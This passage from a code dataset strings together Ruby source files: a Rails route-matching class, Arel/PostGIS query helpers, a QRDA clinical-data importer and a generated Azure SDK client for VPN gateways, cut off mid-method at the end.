:action=>"show", :id=>/[A-Z]\d{5}/} # as requirements. def requirements @defaults.merge(path.requirements).delete_if { |_, v| /.+?/ == v } end def segments path.names end def required_keys required_parts + required_defaults.keys end def score(supplied_keys) required_keys = path.required_names required_keys.each do |k| return -1 unless supplied_keys.include?(k) end score = 0 path.names.each do |k| score += 1 if supplied_keys.include?(k) end score + (required_defaults.length * 2) end def parts @parts ||= segments.map(&:to_sym) end alias :segment_keys :parts def format(path_options) @path_formatter.evaluate path_options end def required_parts @required_parts ||= path.required_names.map(&:to_sym) end def required_default?(key) @_required_defaults.include?(key) end def required_defaults @required_defaults ||= @defaults.dup.delete_if do |k, _| parts.include?(k) || !required_default?(k) end end def glob? !path.spec.grep(Nodes::Star).empty? end def dispatcher? @app.dispatcher? end def matches?(request) match_verb(request) && constraints.all? { |method, value| case value when Regexp, String value === request.send(method).to_s when Array value.include?(request.send(method)) when TrueClass request.send(method).present? when FalseClass request.send(method).blank? else value === request.send(method) end } end def ip constraints[:ip] || // end def requires_matching_verb? !@request_method_match.all? { |x| x == VerbMatchers::All } end def verb verbs.join("|") end private def verbs @request_method_match.map(&:verb) end def match_verb(request) @request_method_match.any? { |m| m.call request } end end end # :startdoc: end
25.525
176
0.544368
abb5a683f07cffae133581106cf825f782d74737
1,698
module ArelHelpers def ah = ArelHelpers class << self def cast(val, type) Arel::Nodes::InfixOperation.new('::', val, Arel.sql(type)) end def contains(a, b) Arel::Nodes::InfixOperation.new('@>', a, b) end def cover(a, b) Arel::Nodes::InfixOperation.new('&&', a, b) end def distance(*args) Arel::Nodes::NamedFunction.new('ST_Distance', args) end def geo_from_text(a) Arel::Nodes::NamedFunction.new('ST_GeographyFromText', [ Arel::Nodes::Quoted.new(Geography.geo_factory.generate_wkt(a)) ]) end def mode(col) Arel.sql %'mode() WITHIN GROUP (ORDER BY "#{col.relation.name}"."#{col.name}")' end def st_centroid(*args) Arel::Nodes::NamedFunction.new('ST_Centroid', args) end def st_covers(*args) Arel::Nodes::NamedFunction.new('ST_Covers', args) end def st_end_point(*args) Arel::Nodes::NamedFunction.new('ST_EndPoint', args) end def st_extent(*args) Arel::Nodes::NamedFunction.new('ST_Extent', args) end def st_length(*args) Arel::Nodes::NamedFunction.new('ST_Length', args) end def st_make_line(*args) Arel::Nodes::NamedFunction.new('ST_MakeLine', args) end def st_start_point(*args) Arel::Nodes::NamedFunction.new('ST_StartPoint', args) end def st_union(*args) Arel::Nodes::NamedFunction.new('ST_Union', args) end def subtract(a, b) Arel::Nodes::Subtraction.new(a, b) end def tsrange(*args) Arel::Nodes::NamedFunction.new('tsrange', args) end def within(*args) Arel::Nodes::NamedFunction.new('ST_DWithin', args) end end end
22.342105
85
0.62073
bf8741c36adbfd776de27ea41db6d93ffc541c24
885
module QRDA module Cat1 class CommunicationFromProviderToProviderImporter < SectionImporter def initialize(entry_finder = QRDA::Cat1::EntryFinder.new("./cda:entry/cda:act[cda:templateId/@root = '2.16.840.1.113883.10.20.24.3.4']")) super(entry_finder) @entry_does_not_have_reason = true @id_xpath = './cda:id' @code_xpath = './cda:code' @author_datetime_xpath = "./cda:author/cda:time" @related_to_xpath = "./sdtc:inFulfillmentOf1/sdtc:actReference" @entry_class = QDM::CommunicationFromProviderToProvider end def create_entry(entry_element, nrh = NarrativeReferenceHandler.new) communication_from_provider_to_provider = super communication_from_provider_to_provider.relatedTo = extract_related_to(entry_element) communication_from_provider_to_provider end end end end
40.227273
144
0.715254
91579575a3af055956c06f4e7c89e54106df631b
46,333
# Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Network::Mgmt::V2020_05_01 # # VpnGateways # class VpnGateways include MsRestAzure # # Creates and initializes a new instance of the VpnGateways class. # @param client service class for accessing basic functionality. # def initialize(client) @client = client end # @return [NetworkManagementClient] reference to the NetworkManagementClient attr_reader :client # # Retrieves the details of a virtual wan vpn gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [VpnGateway] operation results. # def get(resource_group_name, gateway_name, custom_headers:nil) response = get_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! response.body unless response.nil? end # # Retrieves the details of a virtual wan vpn gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def get_with_http_info(resource_group_name, gateway_name, custom_headers:nil) get_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! end # # Retrieves the details of a virtual wan vpn gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def get_async(resource_group_name, gateway_name, custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'gateway_name is nil' if gateway_name.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'gatewayName' => gateway_name}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Creates a virtual wan vpn gateway if it doesn't exist else updates the # existing gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [VpnGateway] Parameters supplied to create or # Update a virtual wan vpn gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [VpnGateway] operation results. # def create_or_update(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) response = create_or_update_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:custom_headers).value! response.body unless response.nil? end # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [VpnGateway] Parameters supplied to create or # Update a virtual wan vpn gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [Concurrent::Promise] promise which provides async access to http # response. # def create_or_update_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) # Send request promise = begin_create_or_update_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:custom_headers) promise = promise.then do |response| # Defining deserialization method. deserialize_method = lambda do |parsed_response| result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() parsed_response = @client.deserialize(result_mapper, parsed_response) end # Waiting for response. @client.get_long_running_operation_result(response, deserialize_method) end promise end # # Updates virtual wan vpn gateway tags. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [TagsObject] Parameters supplied to update a # virtual wan vpn gateway tags. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [VpnGateway] operation results. # def update_tags(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) response = update_tags_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:custom_headers).value! response.body unless response.nil? end # # Updates virtual wan vpn gateway tags. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [TagsObject] Parameters supplied to update a # virtual wan vpn gateway tags. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def update_tags_with_http_info(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) update_tags_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:custom_headers).value! end # # Updates virtual wan vpn gateway tags. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [TagsObject] Parameters supplied to update a # virtual wan vpn gateway tags. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def update_tags_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'gateway_name is nil' if gateway_name.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? fail ArgumentError, 'vpn_gateway_parameters is nil' if vpn_gateway_parameters.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? # Serialize Request request_mapper = Azure::Network::Mgmt::V2020_05_01::Models::TagsObject.mapper() request_content = @client.serialize(request_mapper, vpn_gateway_parameters) request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'gatewayName' => gateway_name}, query_params: {'api-version' => @client.api_version}, body: request_content, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:patch, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Deletes a virtual wan vpn gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # def delete(resource_group_name, gateway_name, custom_headers:nil) response = delete_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! nil end # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [Concurrent::Promise] promise which provides async access to http # response. # def delete_async(resource_group_name, gateway_name, custom_headers:nil) # Send request promise = begin_delete_async(resource_group_name, gateway_name, custom_headers:custom_headers) promise = promise.then do |response| # Defining deserialization method. deserialize_method = lambda do |parsed_response| end # Waiting for response. @client.get_long_running_operation_result(response, deserialize_method) end promise end # # Resets the primary of the vpn gateway in the specified resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [VpnGateway] operation results. # def reset(resource_group_name, gateway_name, custom_headers:nil) response = reset_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! response.body unless response.nil? end # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [Concurrent::Promise] promise which provides async access to http # response. # def reset_async(resource_group_name, gateway_name, custom_headers:nil) # Send request promise = begin_reset_async(resource_group_name, gateway_name, custom_headers:custom_headers) promise = promise.then do |response| # Defining deserialization method. deserialize_method = lambda do |parsed_response| result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() parsed_response = @client.deserialize(result_mapper, parsed_response) end # Waiting for response. @client.get_long_running_operation_result(response, deserialize_method, FinalStateVia::LOCATION) end promise end # # Lists all the VpnGateways in a resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [Array<VpnGateway>] operation results. # def list_by_resource_group(resource_group_name, custom_headers:nil) first_page = list_by_resource_group_as_lazy(resource_group_name, custom_headers:custom_headers) first_page.get_all_items end # # Lists all the VpnGateways in a resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_by_resource_group_with_http_info(resource_group_name, custom_headers:nil) list_by_resource_group_async(resource_group_name, custom_headers:custom_headers).value! end # # Lists all the VpnGateways in a resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_by_resource_group_async(resource_group_name, custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::ListVpnGatewaysResult.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Lists all the VpnGateways in a subscription. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [Array<VpnGateway>] operation results. # def list(custom_headers:nil) first_page = list_as_lazy(custom_headers:custom_headers) first_page.get_all_items end # # Lists all the VpnGateways in a subscription. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_with_http_info(custom_headers:nil) list_async(custom_headers:custom_headers).value! end # # Lists all the VpnGateways in a subscription. # # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_async(custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/providers/Microsoft.Network/vpnGateways' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::ListVpnGatewaysResult.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Creates a virtual wan vpn gateway if it doesn't exist else updates the # existing gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [VpnGateway] Parameters supplied to create or # Update a virtual wan vpn gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [VpnGateway] operation results. # def begin_create_or_update(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) response = begin_create_or_update_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:custom_headers).value! response.body unless response.nil? end # # Creates a virtual wan vpn gateway if it doesn't exist else updates the # existing gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [VpnGateway] Parameters supplied to create or # Update a virtual wan vpn gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def begin_create_or_update_with_http_info(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) begin_create_or_update_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:custom_headers).value! end # # Creates a virtual wan vpn gateway if it doesn't exist else updates the # existing gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [VpnGateway] Parameters supplied to create or # Update a virtual wan vpn gateway. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def begin_create_or_update_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'gateway_name is nil' if gateway_name.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? fail ArgumentError, 'vpn_gateway_parameters is nil' if vpn_gateway_parameters.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? # Serialize Request request_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() request_content = @client.serialize(request_mapper, vpn_gateway_parameters) request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'gatewayName' => gateway_name}, query_params: {'api-version' => @client.api_version}, body: request_content, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:put, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 || status_code == 201 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end # Deserialize Response if status_code == 201 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Deletes a virtual wan vpn gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # def begin_delete(resource_group_name, gateway_name, custom_headers:nil) response = begin_delete_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! nil end # # Deletes a virtual wan vpn gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def begin_delete_with_http_info(resource_group_name, gateway_name, custom_headers:nil) begin_delete_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! end # # Deletes a virtual wan vpn gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def begin_delete_async(resource_group_name, gateway_name, custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'gateway_name is nil' if gateway_name.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'gatewayName' => gateway_name}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:delete, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 || status_code == 202 || status_code == 204 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? result end promise.execute end # # Resets the primary of the vpn gateway in the specified resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [VpnGateway] operation results. # def begin_reset(resource_group_name, gateway_name, custom_headers:nil) response = begin_reset_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! response.body unless response.nil? end # # Resets the primary of the vpn gateway in the specified resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def begin_reset_with_http_info(resource_group_name, gateway_name, custom_headers:nil) begin_reset_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! end # # Resets the primary of the vpn gateway in the specified resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def begin_reset_async(resource_group_name, gateway_name, custom_headers:nil) fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'gateway_name is nil' if gateway_name.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/reset' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'resourceGroupName' => resource_group_name,'gatewayName' => gateway_name,'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:post, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 || status_code == 202 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Lists all the VpnGateways in a resource group. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ListVpnGatewaysResult] operation results. # def list_by_resource_group_next(next_page_link, custom_headers:nil) response = list_by_resource_group_next_async(next_page_link, custom_headers:custom_headers).value! response.body unless response.nil? end # # Lists all the VpnGateways in a resource group. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_by_resource_group_next_with_http_info(next_page_link, custom_headers:nil) list_by_resource_group_next_async(next_page_link, custom_headers:custom_headers).value! end # # Lists all the VpnGateways in a resource group. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_by_resource_group_next_async(next_page_link, custom_headers:nil) fail ArgumentError, 'next_page_link is nil' if next_page_link.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = '{nextLink}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], skip_encoding_path_params: {'nextLink' => next_page_link}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail 